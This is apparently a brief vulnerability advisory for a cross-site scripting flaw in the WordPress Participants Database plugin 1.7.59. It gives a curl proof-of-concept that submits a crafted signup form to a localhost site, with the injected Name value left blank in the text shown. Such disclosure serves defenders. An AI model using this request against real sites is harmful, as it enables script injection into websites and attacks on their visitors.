Cross site scripting (XSS) vulnerability in the Wordpress Participants Database plugin 1.7.59 allows attackers to inject arbitrary javascript via the Name parameter.
curl -k -F action=signup -F subsource=participants-database -F shortcode_page=/?page_id=1 -F thanks_page=/?page_id=1 -F instance_index=2 -F pdb_data_keys=1.2.9.10 -F session_hash=0123456789 -F first_name= -F last_name=a -F [email protected] -F mailing_list=No -F submit_button=Submit http://localhost/?page_id=1